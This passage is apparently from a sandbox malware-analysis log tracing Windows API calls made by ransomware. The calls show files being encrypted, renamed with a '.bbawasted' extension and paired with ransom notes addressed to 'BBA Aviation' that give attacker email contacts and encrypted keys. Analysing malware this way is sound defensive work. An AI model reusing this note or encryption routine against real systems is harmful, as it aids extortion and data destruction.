phProv=0x147fbe4*=0x6a61b8) returned 1 [0234.548] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0234.548] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0234.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0234.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0234.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0234.662] _snwprintf (in: _Dest=0x6ae598, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]akBNscyhS4/haMe1IuwrNq2mBvo9iNJylKrVer29nHJtgsr4JricRohOODzNL3mI\r\nzYgAA11XknDJ9FO/qYF7VWhAhjURSuHCU9n+1kM/EAkyNWRdH0aja4oRvaBKJKm9\r\nP/BX37/WBhzXQ1Ny80J9WBYF1HhGTgtOgKnqrI72WkRgyWJ8DSbWZVv5+817G1R9\r\nDemfmKQ7CjxTtvrhnyduvRgS/FQqG3JmWu1orxGYPKmHDpDdmEz0oiTTxXAMpaUC\r\n9+78ksJuYQhz1m1RIwbuDNp4/sLU6zOgnwhkS0t0oDFn1MlO+bf3pPP20nlVuGZf\r\nYLPmIFf8HsfgfXwPF9I2Zizwh8JjJEHcLWqKgWcyr6fom6C4nizU4t15REcVaEUA\r\ni/0awEP1xgx54rNC2VXm0A1aAxY7Gd1PhMvf7mN7PSlbw0js5uMv4SCkohGrKCEs\r\nBHTiqOR2ODY3zWZ1JfUF4dNW/XEY/OzGSRFmLlp1kT8Z8PqAV+QlykQk65aRgFub\r\nc365aoPDpof0Y2i0bXpd42SgEa1dHBegZkUkc6SKKUY8glLjmPlXHJ5eTnljvBJv\r\nJ4k0zIkfWjemylXXNCC/pENiI19+D84vf3iullc0Yh1YaXeLm/e24c3R3LY5xjl2\r\niaRDVX/m6UnUaopFHKVnCP/QdrgQyoofH7duD1BDgYB=[end_key]\r\nKEEP IT\r\n") returned 984 [0234.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0234.662] WriteFile (in: hFile=0x290, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0234.663] SetEndOfFile (hFile=0x290) returned 1 [0234.666] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0234.667] CloseHandle (hObject=0x290) returned 1 [0234.667] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a21e0 | out: hHeap=0x660000) returned 1 [0234.667] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b17b0 | out: hHeap=0x660000) returned 1 [0234.669] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6680) returned 1 [0234.670] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0234.670] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0234.670] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_eos.css") returned 52 [0234.671] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6c4b88 [0234.671] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0234.671] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0234.671] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f98) returned 1 [0234.672] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6ae598 | out: pbBuffer=0x6ae598) returned 1 [0234.672] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0234.672] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_eos.css.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.css.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0234.673] WriteFile (in: hFile=0x290, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0234.674] SetEndOfFile (hFile=0x290) returned 1 [0234.675] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0234.675] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0234.675] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_eos.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.css"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_eos.css.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.css.bbawasted")) returned 1 [0234.678] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_eos.css.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.css.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0234.678] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0234.678] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1a2c [0234.678] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a2c) returned 0x5f0000 [0234.678] CloseHandle (hObject=0x27c) returned 1 [0234.680] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0234.680] CloseHandle (hObject=0x294) returned 1 [0234.680] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0234.681] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f10) returned 1 [0234.681] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0234.681] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0234.682] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a69b0) returned 1 [0234.682] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0234.682] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0234.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0234.698] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0234.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0234.698] _snwprintf (in: _Dest=0x6ae598, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]mPf1S8UDg7R+uK0Bawdat7okLqqoxqJO22JX3ulAyU7RybB176/SHgCNYkhA7ya1\r\nccMqZ7loIm6OXxF7amOnJBOmZNY3cczpr/5xtcIicBsdimwwaOWp31XaMaSbahCw\r\nCU2E4Z4j+3kJmSRt8e5qH8GYdISEFXvfD50vZPHvJ2fyb3DvVUUYIg5xRIXPZYfm\r\nvhxq/iUlE3H7BUFFA613KhxW9x82g5mO8BU4MqZwscreZmMjDsWwAyim61bATFDO\r\nZK7QAu285SuejqrMpZUMgfM643AWiST0sjPaKKAmbZPzJNEuZZbSAULvL5mdK2A0\r\nCDhHlCJvqO0GaZVSJK/msGGe7D2sbnO3nflcqKMtzILbc/1sQN3bHGvhjlTPOiDJ\r\n6jzUX9J0BUPUu1s32mC4fgm87oFisKtm6yJvSnHy3xHwrRTqm9h9DsgDfUYJRcQH\r\nhTcQ7i2XkbLbnHQ1GIN60X9mLcvT2jbxBKYhdeF3PGQap54CfCAOHRSI+7K257S3\r\nD/O6aVEGL8GzCGK9dYtA8DB58gnkRa3AU7yvJwB9h4ai8s8Fe6fNIB+GcTCgTrzS\r\nyqBtDbI+c70Cq6XTnL7MXm137q9ee7QbyOGoS7+T3Ik2pMctLXCHHDu7SbG04C/f\r\nROaL1VDHWYd3/PuetLlMZVls4kuIH5AkX/G3sWVu7a5=[end_key]\r\nKEEP IT\r\n") returned 984 [0234.698] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0234.698] WriteFile (in: hFile=0x290, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0234.863] SetEndOfFile (hFile=0x290) returned 1 [0235.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0235.113] CloseHandle (hObject=0x290) returned 1 [0235.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0235.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7220 | out: hHeap=0x660000) returned 1 [0235.113] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6130) returned 1 [0235.114] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0235.114] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0235.114] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm") returned 53 [0235.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6c4b88 [0235.114] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.114] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a69b0) returned 1 [0235.115] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.115] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0235.115] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0235.116] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.117] SetEndOfFile (hFile=0x290) returned 1 [0235.117] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.117] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.117] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.htm.bbawasted")) returned 1 [0235.118] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0235.118] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0235.119] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x100ae [0235.119] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100ae) returned 0x600000 [0235.119] CloseHandle (hObject=0x27c) returned 1 [0235.195] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0235.197] CloseHandle (hObject=0x280) returned 1 [0235.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb88 [0235.197] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0235.198] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x6adbd0 | out: pbBuffer=0x6adbd0) returned 1 [0235.198] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0235.198] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6c58) returned 1 [0235.199] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0235.199] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0235.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb88 | out: hHeap=0x660000) returned 1 [0235.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.210] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]cytZqgVKuFmUL9/tiOZ2Y5PDTioiatgfK5tZylW1BCDpLMVnYVPbla2eWQJOOjXz\r\nooKv1LGBLWpkefugG9DmkWbDw1o7Y/mhq3CsNVKf6fVl+8u7p6gChcp+YK8xha5r\r\nn+VhLSsrwYISgjGAq3s+SBYz/N821d+sqVURMzFp786XJAJxB4ukY5C+nbX50eUx\r\nMWqYwNfoEYxMRyxoDhN33eGuzW887Yxbj3cDCkKDOQDcRNZBibzA9FL+JZy/npJ6\r\nmBkA9yz2GvaLZkQEY8cCvVGxinuubepvbE29RZhKh1AmjxhV5oO2TCgAQaa2xcfV\r\n/61V5RMhVmb2lm62rZdmKsdjWE86yoLner7rEzXkLVFr573CSzMJ5oWuAmbgPEc8\r\nY4glgEDyE9BjxhuU/Rl0NEULm0zKafKSjyCHiiBAXjCN4qZg5/kK2xGphIrNVC5J\r\nCC/BKYzoWZ1Cx+zEh5li5AwGX6mTNdC2YmnxNlEC1xy7eaj+M33kg3uvH0bFAGqa\r\nM3PShu0YDQvpxKKWvWhfR2e3b/9IRMcMSBXnvqMzsD+kyF4ApwdxCvgFsTf3vhwZ\r\nlh/WHBxeQofVMIgHTRsIDWH3jGeMk2FBH0vOHrai0j6LZl7CQwHi0X2l5LGPYRWt\r\nHuOypZYzNjva/TyrJNjRyLRM1SxMjpbZkz70e7YhBVA=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.210] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0235.210] SetEndOfFile (hFile=0x290) returned 1 [0235.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.213] CloseHandle (hObject=0x290) returned 1 [0235.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0235.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7ea0 | out: hHeap=0x660000) returned 1 [0235.214] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a61b8) returned 1 [0235.215] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0235.215] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0235.215] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm") returned 56 [0235.215] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0235.215] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.215] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.215] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f10) returned 1 [0235.216] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.216] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0235.216] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_bg-bg.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0235.219] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.220] SetEndOfFile (hFile=0x290) returned 1 [0235.220] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.221] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.221] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_bg-bg.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_bg-bg.htm.bbawasted")) returned 1 [0235.222] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_bg-bg.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0235.222] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0235.222] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x3de0d [0235.222] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3de0d) returned 0x5f0000 [0235.222] CloseHandle (hObject=0x280) returned 1 [0235.299] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0235.302] CloseHandle (hObject=0x294) returned 1 [0235.302] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb88 [0235.302] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0235.302] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x6adbd0 | out: pbBuffer=0x6adbd0) returned 1 [0235.302] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0235.302] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6928) returned 1 [0235.303] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0235.303] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0235.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb88 | out: hHeap=0x660000) returned 1 [0235.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0235.331] _snwprintf (in: _Dest=0x6ae598, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]qqsQ1asww019gIxBK3zXqyNT4hT/DCMcChnQvvEjLuFiA/KyOKslTvq3zqBK4prl\r\niUJr6OKmJ8KHLzs5ooFTz+lbjkWx6/hHeyQjGQriyfH/Nc+NdhaNVC/o1684uxsr\r\noY81wHZTNTtaGO3wh9FaSKg6pmdHLITDE4sT4+Qp4iIPwpjUCMsXjQ/JRA6WCf+8\r\nSMO0TL0M/IM3MQU7ZQft52CY8iSa3zYuokN7tAxIStmlqD62OCtHsESgLZLJyarw\r\nGhNL+gLQDv5nvoakRQqIAd7BJiPYvUNiNwyO5MZmdsoCzIM1PjSEeAHWf+/f+hL/\r\n3GWFVOisD4mhaBMA94knIFCA2Jv2y89sfBTzTrJ/gZDH0j+h0xiCgQfi8vvBfnSj\r\n50hBsHu0DQ9cZTi9VaDFNcwFJzh+cNSeCeWZ6Iv8VZrvs2/s/zG7KVvJQ8X901Qt\r\nSabCcRAVfH8HD3YYEB8YSVA0Kb8N3r5LFg4cbBLn1zkndtCeRRCP4mbiN97Tk6ZE\r\nyMtCGIiCRAaDhKEgs6DOSNDcVf8Ut7ioS+MtWc9Aeoambf3SVErWLyfQ4mlb6VI0\r\n+ceHW8fTL2k6dIoMnlERAAP/bZY5J8jxG2jlGmvgHPPhOkrZXa4LJjw3dgmgh2PV\r\nHmNYtdWzUUwJNr01ujjzk5NxY1cjCIoJRPmUZcVvKI5=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.331] WriteFile (in: hFile=0x290, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0235.331] SetEndOfFile 